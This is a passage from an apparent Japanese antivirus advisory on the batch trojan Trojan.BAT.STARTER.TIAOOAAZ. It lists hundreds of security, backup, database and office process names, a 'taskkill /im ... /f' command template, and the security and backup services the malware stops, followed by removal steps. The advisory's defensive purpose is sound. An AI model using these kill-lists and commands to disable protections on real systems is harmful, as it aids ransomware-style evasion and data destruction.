- scan32.exe
- scanexplicit.exe
- scanfrm.exe
- scanmailoutlook.exe
- scanmsg.exe
- scanwscs.exe
- scfmanager.exe
- scfservice.exe
- scftray.exe
- schdsrvc.exe
- schupd.exe
- sdrservice.exe
- sdtrayapp.exe
- seccenter.exe
- securitycenter.exe
- semsvc.exe
- sesclu.exe
- setloadorder.exe
- setupguimngr.exe
- sevinst.exe
- sgbhp.exe
- shstat.exe
- sidebar.exe
- siteadv.exe
- smc.exe
- smcgui.exe
- smex_activeupda
- smex_master.exe
- smex_remoteconf
- smex_systemwatc
- smoutlookpack.exe
- sms.exe
- smsectrl.exe
- smselog.exe
- smsesjm.exe
- smsesp.exe
- smsesrv.exe
- smsetask.exe
- smseui.exe
- smsx.exe
- snac.exe
- sndmon.exe
- sndsrvc.exe
- snhwsrv.exe
- spbbcsvc.exe
- spideragent.exe
- spiderml.exe
- spidernt.exe
- spiderui.exe
- spntsvc.exe
- srvload.exe
- srvmon.exe
- sschk.exe
- ssm.exe
- ssp.exe
- ssscheduler.exe
- starta.exe
- stinger.exe
- stopa.exe
- stopp.exe
- stwatchdog.exe
- svcgenerichost
- svcharge.exe
- svcntaux.exe
- svdealer.exe
- svframe.exe
- svtray.exe
- swc_service.exe
- swdsvc.exe
- sweepsrv.sys
- swi_service.exe
- swnetsup.exe
- symlcsvc.exe
- symproxysvc.exe
- symsport.exe
- symtray.exe
- symwsc.exe
- sysdoc32.exe
- sysoptenginesvc.exe
- tbmon.exe
- tclproc.exe
- tfgui.exe
- tfservice.exe
- tftray.exe
- tfun.exe
- tmas.exe
- tmlisten.exe
- tmntsrv.exe
- tmpfw.exe
- tmproxy.exe
- tnbutil.exe
- toolbarupdater.exe
- tpsrv.exe
- trjscan.exe
- trupd.exe
- tsansrf.exe
- tsatisy.exe
- tscutynt.exe
- tsmpnt.exe
- ucservice.exe
- udaterui.exe
- uiseagnt.exe
- uiwatchdog.exe
- umxagent.exe
- umxcfg.exe
- umxfwhlp.exe
- umxpol.exe
- unsecapp.exe
- unvet32.exe
- up2date.exe
- update_task.exe
- updaterui.exe
- updtnv28.exe
- upfile.exe
- upschd.exe
- urllstck.exe
- usrprmpt.exe
- v2iconsole.exe
- v3clnsrv.exe
- v3exec.exe
- v3imscn.exe
- v3lite.exe
- v3main.exe
- v3medic.exe
- v3sp.exe
- v3svc.exe
- vetmsg.exe
- vettray.exe
- vpc32.exe
- vpdn_lu.exe
- vprosvc.exe
- vprot.exe
- vptray.exe
- vrv.exe
- vrvmail.exe
- vrvmon.exe
- vrvnet.exe
- vshwin32.exe
- vsmain.exe
- vsmon.exe
- vsserv.exe
- vsstat.exe
- vstskmgr.exe
- webproxy.exe
- webscanx.exe
- websensecontrolservice.exe
- webtrapnt.exe
- wfxctl32.exe
- wfxmod32.exe
- wfxsnt40.exe
- winroute.exe
- wrctrl.exe
- wrsa.exe
- wrspysetup.exe
- wscntfy.exe
- wssfcmai.exe
- wtusystemsuport.exe
- xcommsvr.exe
- xfilter.exe
- zanda.exe
- zavcore.exe
- zillya.exe
- zlclient.exe
- zlh.exe
- taskkill /im {Process Name} /f -Terminate the following running processes:
- aclient.exe
- aclntusr.exe
- aesecurityservice.exe
- aexagentuihost.exe
- aexnsagent.exe
- aexnsrcvsvc.exe
- aexsvc.exe
- aexswdusr.exe
- agntsvc.exe
- amsvc.exe
- atrshost.exe
- avscc.exe
- basfipm.exe
- bcreporter.exe
- bcrservice.exe
- bluestripecollector.exe
- ccflic0.exe
- ccflic4.exe
- ccm messaging.exe
- cdm.exe
- certificateprovider.exe
- chrome.exe
- client.exe
- client64.exe
- collwrap.exe
- config_api_service.exe
- control_panel.exe
- csdbsync.exe
- cslog.exe
- csmon.exe
- csradius.exe
- csrss_tc.exe
- cstacacs.exe
- ctdataload.exe
- cwbunnav.exe
- dbeng50.exe
- dbsnmp.exe
- dltray.exe
- dolphincharge.e
- dolphincharge.exe
- dsmcad.exe
- dsmcsvc.exe
- dwrcst.exe
- encsvc.exe
- epmd.exe
- erlsrv.exe
- excel.exe
- execstat.exe
- firefox.exe
- firefoxconfig.exe
- fnplicensingservice.exe
- frzstate2k.exe
- googlecrashhandler.exe
- googlecrashhandler64.ex
- googleupdate.exe
- hasplmv.exe
- hdb.exe
- healthservice.exe
- hpqwmiex.exe
- ilicensesvc.exe
- inet_gethost.exe
- infopath.exe
- isqlplussvc.exe
- kb891711.exe
- keysvc.exe
- loggetor.exe
- managementagenthost.exe
- managementagentnt.exe /
- monitoringhost.exe
- msaccess.exe
- msdtssrvr.exe
- msftesql.exe
- msmdsrv.exe
- mspmspsv.exe
- mspub.exe
- musnotificationux.exe
- mydesktopqos.exe
- mydesktopservice.exe
- mysqld.exe
- mysqld-nt.exe
- mysqld-opt.exe - sql
- nd2svc.exe
- ndrvs.exe
- ndrvx.exe
- nerosvc.exe
- netalertclient.exe
- netsession_win.exe
- nexe
- nimbus.exe
- nimcluster.exe
- nlclient.exe
- nlsvc.exe
- nmagent.exe
- npmdagent.exe
- nslocollectorservice.exe
- ntcaagent.exe
- ntcadaemon.exe
- ntcaservice.exe
- ntevl.exe
- ntservices.exe
- ocautoupds.exe
- ocomm.exe
- ocssd.exe
- omniagent.exe
- omslogmanager.exe
- omtsreco.exe
- onenote.exe
- oracle.exe
- outlook.exe
- paamsrv.exe
- patch.exe
- patrolagent.exe
- patrolperf.exe
- paxton.net2.clientservice.exe
- paxton.net2.commsserverservice.exe
- pcscm.exe
- pcsws.exe
- pmgreader.exe
- pmon.exe
- powerpnt.exe
- ppmcativedetection.exe
- pralarmmgr.exe
- prcalculationmgr.exe
- prconfigmgr.exe
- prdatabasemgr.exe
- premailengine.exe
- preventmgr.exe
- prftpengine.exe
- prgateway.exe
- printdevice.exe
- prlicensemgr.exe
- procexp.exe
- proficy administrator.exe
- proficyclient.exe4
- proficypublisherservice.exe
- proficyserver.exe
- proficysts.exe
- prprintserver.exe
- prproficymgr.exe
- prrds.exe
- prreader.exe
- prrouter.exe
- prschedulemgr.exe
- prstubber.exe
- prsummarymgr.exe
- prunsrv.exe
- prwriter.exe
- pthosttr.exe
- pview.exe
- pviewer.exe
- pwdfilthelp.exe
- rapuisvc.exe
- rdrcef.exe
- realmon.exe
- repmgr64.exe
- reportingservicesservicesservice.exe
- rscd.exe
- rscdsvc.exe
- rssensor.exe
- sbamsvc.exe
- scfagent_64.exe
- seanalyzertool.exe
- securitymanager.exe
- seestat.exe
- server_eventlog.exe
- server_runtime.exe
- slee81.exe
- snicheckadm.exe
- snichecksrv.exe
- snicon.exe
- snsrv.exe
- spooler.exe
- spyemergency.exe
- spyemergencysrv.exe
- sqbcoreservice.exe
- sqlagent.exe
- sqlbrowser.exe
- sqlservr.exe
- sqlwriter.exe
- ssecuritymanager.exe
- steam.exe
- swnxt.exe
- swserver.exe
- synctime.exe
- taskhostw.exe
- tbirdconfig.exe
- tdimon.exe
- teamviewer_service.exe
- thebat.exe
- thebat64.exe
- thunderbird.exe
- tiaspn~1.exe
- tnslsnr.exe
- traflnsp.exe
- traptrackermgr.exe
- uplive.exe
- uploadrecord.exe
- url_response.exe
- useractivity.exe
- useranalysis.exe
- usergate.exe
- vgauthservice.exe
- visio.exe
- vmacthlp.exe
- vmtoolsd.exe
- vmware-converter.exe
- vmware-converter-a.exe
- vmwaretray.exe
- vpatch.exe
- win32sysinfo.exe
- winlog.exe
- winvnc4.exe
- winword.exe
- wordpad.exe
- workflowresttest.exe
- xfssvccon.exe
- zapro.exe
- zonealarm.exe
- zoolz.exe - storage
- %Temp%\sync.exe
プロセスの終了
マルウェアは、感染コンピュータ上で確認した以下のサービスを終了し、セキュリティ対策製品に関連するサービスを無効にします。
- AcronisAgent
- aswBcc
- BackupExecRPCService
- ccEvtMgr
- ccSetMgr
- EhttpSrv
- ekrn
- EPIntegrationService
- EPProtectedService
- EPSecurityService
- EPUpdateService
- ESHASRV
- FA_Scheduler
- IDriverT
- klnagent
- macmnsvc
- masvc
- MBAMService
- McShield
- mfefire
- mfemms
- mfevtp
- mfewc
- myAgtSvc
- ntrtscan
- RumorServer
- SepMasterService
- SepMasterServiceMig
- Smcinst
- SNAC
- SntpService
- svcGenericHost
- swi_filter
- swi_service
- swi_update
- swi_update_64
- Symantec
- Symantec System Recovery
- TmCCSF
- tmlisten
- TmPfw
- WdNisSvc
- WinDefend
対応方法
対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 15.846.03
初回 VSAPI パターンリリース日 2020年5月4日
VSAPI OPR パターンバージョン 15.847.00
VSAPI OPR パターンリリース日 2020年5月5日
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.BAT.STARTER.TIAOOAAZ」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください